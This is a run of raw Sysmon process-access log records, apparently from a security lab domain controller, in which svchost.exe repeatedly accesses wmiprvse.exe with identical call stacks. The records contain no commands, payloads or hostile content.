13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.648{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 